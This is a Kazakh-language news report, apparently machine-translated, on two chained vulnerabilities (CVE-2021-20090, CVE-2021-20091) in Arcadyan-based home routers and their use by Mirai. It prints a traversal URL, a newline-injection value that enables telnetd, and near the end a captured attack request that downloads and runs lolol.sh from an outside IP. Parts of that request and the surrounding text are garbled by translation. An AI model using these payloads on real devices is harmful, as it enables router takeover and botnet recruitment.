17 өндірушіге әсер ететін үй маршрутизаторларындағы осалдық

Микробағдарламасы Arcadyan компаниясының HTTP серверін іске асыруды пайдаланатын үй маршрутизаторларына қарсы желіде жаппай шабуыл тіркелді. Құрылғыларды басқаруды алу үшін түбірлік құқықтары бар ерікті кодты қашықтан орындауға мүмкіндік беретін екі осалдықтың тіркесімі пайдаланылады. Мәселе Arcadyan, ASUS және Buffalo ADSL маршрутизаторларының жеткілікті кең ауқымына, сондай-ақ Beeline брендтерімен жеткізілетін құрылғыларға (мәселе Smart Box Flash-те расталған), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone және басқа байланыс операторлары. Мәселе Arcadyan микробағдарламасында 10 жылдан астам уақыт бойы болғаны және осы уақыт ішінде 20 түрлі өндірушілердің кем дегенде 17 құрылғы үлгісіне көшуге мүмкіндік алғаны атап өтілді.

Бірінші осалдық CVE-2021-20090 аутентификациясыз кез келген веб-интерфейс сценарийіне қол жеткізуге мүмкіндік береді. Осалдықтың мәні мынада: веб-интерфейсте кескіндер, CSS файлдары және JavaScript сценарийлері жіберілетін кейбір каталогтар аутентификациясыз қол жетімді. Бұл жағдайда аутентификациясыз кіруге рұқсат етілген каталогтар бастапқы маска арқылы тексеріледі. Негізгі каталогқа өту жолдарында “../” таңбаларын көрсету микробағдарлама арқылы бұғатталған, бірақ “..% 2f” тіркесімін пайдалану өткізіліп жіберіледі. Осылайша, «http://192.168.1.1/images/..%2findex.htm» сияқты сұрауларды жіберу кезінде қорғалған беттерді ашуға болады.

Екінші осалдық, CVE-2021-20091, аутентификацияланған пайдаланушыға параметрлерде жаңа жол таңбасының болуын тексермейтін apply_abstract.cgi сценарийіне арнайы пішімделген параметрлерді жіберу арқылы құрылғының жүйелік параметрлеріне өзгертулер енгізуге мүмкіндік береді. . Мысалы, пинг операциясын орындау кезінде шабуылдаушы тексерілетін IP мекенжайы бар өрісте “192.168.1.2%0AARC_SYS_TelnetdEnable=1” мәнін және /tmp/etc/config/ параметрлер файлын жасау кезінде сценарийді көрсете алады. .glbcfg, оған «AARC_SYS_TelnetdEnable=1» жолын жазады, ол түбірлік құқықтары бар шектеусіз пәрмен қабығына қатынасты қамтамасыз ететін telnetd серверін белсендіреді. Сол сияқты, AARC_SYS параметрін орнату арқылы жүйеде кез келген кодты орындауға болады. Бірінші осалдық проблемалық сценарийді «/images/..%2fapply_abstract.cgi» ретінде қатынасу арқылы аутентификациясыз іске қосуға мүмкіндік береді.

Осалдықтарды пайдалану үшін шабуылдаушы веб-интерфейс жұмыс істеп тұрған желі портына сұрау жібере алуы керек. Шабуылдың таралу динамикасына сүйенсек, көптеген операторлар қолдау қызметі проблемаларды диагностикалауды жеңілдету үшін сыртқы желіден өз құрылғыларына кіруді қалдырады. Интерфейске кіру тек ішкі желімен шектелсе, «DNS қайта қосу» әдісі арқылы сыртқы желіден шабуыл жасауға болады. Маршрутизаторларды Mirai ботнетіне қосу үшін осалдықтар қазірдің өзінде белсенді түрде пайдаланылуда: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Қосылым: Пайдаланушы агентін жабу: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Ақпарат көзі: opennet.ru

пікір қалдыру